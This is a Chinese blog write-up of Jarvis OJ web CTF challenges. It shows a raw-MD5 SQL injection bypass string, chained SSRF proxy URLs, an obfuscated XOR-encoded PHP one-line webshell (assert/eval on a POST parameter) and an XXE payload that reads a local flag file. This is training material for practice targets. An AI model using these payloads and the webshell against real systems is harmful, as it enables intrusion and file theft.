Jarvis-OJ-Web writeup

最新推荐文章于 2023-04-24 17:07:59 发布
最新推荐文章于 2023-04-24 17:07:59 发布
阅读量1k 收藏 2
点赞数
分类专栏: WriteUp 文章标签: Jarvis-OJ Web writeup ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a370793934/article/details/103286995
版权

PORT51

访问了页面发现让你

Please use port 51 to visit this site.

明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–local-port命令

--local-port <端口号>[-num]设置连接使用的首选端口号或本地端口范围。请注意,端口号是一种稀缺资源,繁忙时,请将端口范围缩小来避免不必要的连接失败。(在7.15.2版加入)

构造payload如下

sudo curl --local-port 51 http://web.jarvisoj.com:32770/

1得到结果

PCTF{M45t3r_oF_CuRl}

 

LOCALHOST

http://web.jarvisoj.com:32774/

题目链接点进去提示说,localhost access only!!

直接改请求头里的X-Forwarded-For: 127.0.0.1即可。

Yeah!! Here's your flag:

PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}

 

Login

http://web.jarvisoj.com:32772/

抓包,发现了hint Hint: "select * from `admin` where password='".md5($pass,true)."'"

想到万能密码绕过

万能密码字符串:ffifdyop

md5后的值:276f722736c95d99e921722cf9ed621c

十六进制解码得到:'or'6 ]  !r,  b

所以输入ffifdyop得到

Correct pass!! Your Flag:

PCTF{R4w_md5_is_d4ng3rous}

 

Hello World

http://web.jarvisoj.com:32792/

御剑扫描发现admin_s3cr3t.php,访问

http://web.jarvisoj.com:32792/admin_s3cr3t.php

得到flag{hello guest} 但不对

bs抓包改admin=1

得到

flag{hello_admin~}

 

菜刀

http://web.jarvisoj.com:32782/

看源码有SSRF漏洞,bs抓包提示,管理员ip必须为202.5.19.128,构造:

http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/robots.txt

显示

User-agent: *

Disallow:trojan.php

Disallow:trojan.php.txt

访问

http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/trojan.php.txt

得到

<?php ${("#"^"|").("#"^"|")}=("!"^"`").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");${("#"^"|").("#"^"|")}(("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("}"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&"). ("#"^"p"). (">"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));?>

复制到php文件,用phpstuy解析,得到一句话木马密码360

Warning: assert() [function.assert]: Assertion "eval($_POST[360])" failed in C:\phpStudy\PHPTutorial\WWW\222.php on line 1

然后访问

http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/trojan.php

POST内容:360=phpinfo();

发现直接显示了flag

flag:CTF{fl4g_1s_my_c40d40_1s_n0t_y0urs}

 

api调用

题目链接: http://web.jarvisoj.com:9882/

在窗口输入数据会根据输入数据有不同的回显。

回显为输入数据+own

结合题目描述:请设法获得目标机器/home/ctf/flag.txt中的flag值,想到了利用XXE读取文件。

于是把请求头里的Content-Type改为application/xml,并传入<name>miracle778</name>进行测试,如下图,发现返回了XML内容。

于是可以确定,此处存在XXE漏洞,然后只需构造payload读取/home/ctf/flag.txt即可。

payload:

<!DOCTYPE miracle [

<!ENTITY name SYSTEM "file:///home/ctf/flag.txt">

]

>

<miracle>&name;</miracle>

 

可以得到最后的flag为

CTF{XxE_15_n0T_S7range_Enough}

 

待续

a370793934
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
Jarvis OJ -WEB-WRITE-UP(一)
郁离歌丶的博客
04-27 1653
Jarvis OJ -WEB-WRITE-UP(一) PORT51  题目链接: http://web.jarvisoj.com:32770/ 访问页面之后,页面显示:Please use port 51 to visit this site.当时看到了这个还以为是需要访问这个网站的51端口,但是这个网址已经确定了是访问32770端口,后来一直都没有思路。最后才发现是要求本地以51端口去访问这个网...
Jarvis OJ - ALL CHALLENGS
qq_41996851的博客
04-12 405
作为一个安全菜鸟正在慢慢入门,在了解完基本的CTF知识后就开始刷题找知识点的感觉了 虽然并不想写这篇博客,因为大部分题的思路都是看人家的writeup,并且人家写的比我更详细,但一些题目有很多知识点需要记住,所以就有了这篇博客 WEB篇 LOCALHOST 看解决数量就知道没啥可说的; 对于ip可控的2个头部一个是x-forwarded-for,一个是client-ip x-forwarded-for: X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器.
jarvis oj Web By Assassin
Assassin
08-22 8611
LOCALHOST套路题,构造headers中加上x-forwarded-for=127.0.0.1即可 PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}PORT51访问了页面发现让你Please use port 51 to visit this site.明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–l
漏洞系列一一看我一招征服漏洞SSRF
Android_wxf的博客
07-08 719
SSRF简介 SSRF(Server-Side Request Forgery:服务器端请求伪造是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 如图是一个简单的SSRF 源码如下 <?php
Bugku CTF web12(Web
ChaoYue_miku的博客
02-23 1042
0、打开网页,发现需要输入用户名和密码 用户名使用admin 密码可以爆破得到,也可以查看注释 将dGVzdDEyMw==进行base64解码得到密码:test123 1、输入用户名和密码 无法登录,提示只有本地管理员可以访问,由此考虑到使用xff方法修改IP为本地地址 2、使用BurpSuite抓包 3、添加:X-Forwarded-For: 127.0.0.1后发送 4、得到flag:flag{9876894a5ec96ef77b6d54ba5cd983bf.
jarvis-api:JARVIS系统的API部分
05-16
jarvis-api [WIP] JARVIS:只是一个非常智能的系统 该项目是JARVIS系统的API部分。 它是用于管理您的忙碌生活的各种插件的集合。 (将用于UI前端。) 安装 您将需要来运行服务器。 安装完成后,在项目文件夹中运行...
Jarvis-Lee:Jarvis-Lee 是一个基于 Django 的系统构建,用来帮助我妹妹 Ashley(Ash) 自己学习
05-30
贾维斯-李只是一个相当智能的系统在途中学习 为了向 MCU 的 Stan Lee 和 Jarvis 致敬,Jarvis-Lee 是一个基于 Django 的系统构建,用于帮助我的妹妹 Ashley(Ash) 自己学习。
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
JARVIS-GUI
03-29
JARVIS-GUI
一次失败的CTF尝试记录(SSRF利用)
痴人说梦梦中人
10-13 957
访问url,获取index.php代码如下: <?php if(!(isset($_POST['url']))){ show_source(__FILE__); } // include_once "ping.php"; if (isset($_POST['url'])) { $link = $_POST['url']; if(check($link)){ $curlobj = curl_init(); curl_setopt($curlobj
CTF-WEB-01-localhost access only!!
weixin_30402085的博客
07-30 2886
题目地址:http://http://web.jarvisoj.com:32774/ 0x01 题目分析   localhost access only字面意思只允许本机登录   考虑添加header:             X-Forward-For 127.0.0.1     ...
ctfshow SSRF
..
02-28 957
web 351 直接读取本地文件 url=file:///var/www/html/flag.php url=127.0.0.1/flag.php web352 这里要求是http或者https协议,只需要满足这个就可以了。 url=http://localhost/flag.php url=http://127.0.0.1/flag.php url=http://127.1/flag.php url=http://0.0.0.0/flag.php url=http:/...
CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 881
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
CTF之SSRF常见绕过
qq_42383069的博客
04-24 1284
ip进制转换:https://tool.520101.com/wangluo/jinzhizhuanhuan。当程序中限制了我们使用localhost和127.0.0.1时,便可以利用进制转换来绕过。进制转换:https://www.sojson.com/hexconvert.html。
CTFHub技能树 Web-SSRF 内网访问
Senimo
07-01 402
CTFHub技能树 Web-SSRF 内网访问 hint:尝试访问位于127.0.0.1的flag.php吧 启动环境,访问页面为空白,查看URL: http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=_ 其中存在 GET 方式的传参:url=_,将127.0.0.1/flag.php地址填入尝试访问: http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=
ctfhub--web--SSRF(1.内网访问2.伪协议读取文件 3.端口扫描 4.POST请求 5.文件上传 8.URL Bypass 9.数字IP Bypass) )
feiniaotjx的博客
10-10 520
ctfhub--web--SSRF1.内网访问2.伪协议读取文件3.端口扫描4.POST请求 1.内网访问 传参给url,访问一个地址文件 2.伪协议读取文件 读取网站文件 3.端口扫描 通过返回的内容判断端口是否存在 import requests try: for i in range(8000,9001): url='http://challenge-43493ad3b38edf3f.sandbox.ctfhub.com:10800/?url=127.0.0.1:'+
Jarvis OJ - Login
weixin_43464124的博客
05-19 255
无聊的时候写了一道web 题目地址:Login 就不贴图了 太麻烦了… 就是让输入登陆密码 F12之后什么都没发现 抓包之后发现了一些东西 Hint: “select * from admin where password=’”.md5($pass,true)."’" 这是一个md5加密后的sql注入 md5(pass, true): 参数一是要加密的字符串; 参数二是输出格式: true,表示输...
jarvis oj Web By Assassin
qq_43679818的博客
01-10 995
jarvis oj Web By Assassin
Error: Cannot find module '@babel/plugin-proposal-object-rest-spread' Require stack: - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\config\files\plugins.js - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\config\files\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-plugin-babel\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-service\lib\Service.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-service\bin\vue-cli-service.js - Did you mean "@babel/plugin-transform-object-rest-spread"? Make sure that all the Babel plugins and presets you are using are defined as dependencies or devDependencies in your package.json file. It's possible that the missing plugin is loaded by a preset you are using that forgot to add the plugin to its dependencies: you can workaround this problem by explicitly adding the missing package to your top-level package.json.
最新发布
07-22
这个错误提示表明在你的项目中找不到 `@babel/plugin-proposal-object-rest-spread` 这个模块。这可能是由于缺少该模块或者配置问题导致的。 解决方法如下: 1. 确保你的项目中已经安装了 `@babel/plugin-proposal-object-rest-spread` 模块。可以通过运行以下命令来安装它: ```bash npm install @babel/plugin-proposal-object-rest-spread --save-dev ``` 2. 检查你的 Babel 配置文件(通常是 `.babelrc` 或 `babel.config.js` 文件),确保 `@babel/plugin-proposal-object-rest-spread` 在插件列表中被正确定义。例如,你的 `.babelrc` 文件应该包含类似以下的配置: ```json { "plugins": [ "@babel/plugin-proposal-object-rest-spread" ] } ``` 3. 如果你使用了 Babel 预设(preset),请确保预设的依赖中包含 `@babel/plugin-proposal-object-rest-spread`。你可以通过查看预设的文档或者源代码来确认。 4. 如果以上步骤都没有解决问题,可以尝试删除 `node_modules` 目录并重新安装依赖: ```bash rm -rf node_modules npm install ``` 如果你仍然遇到问题,请检查你的项目配置和依赖项是否正确,并参考错误提示中的建议来解决问题。希望对你有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值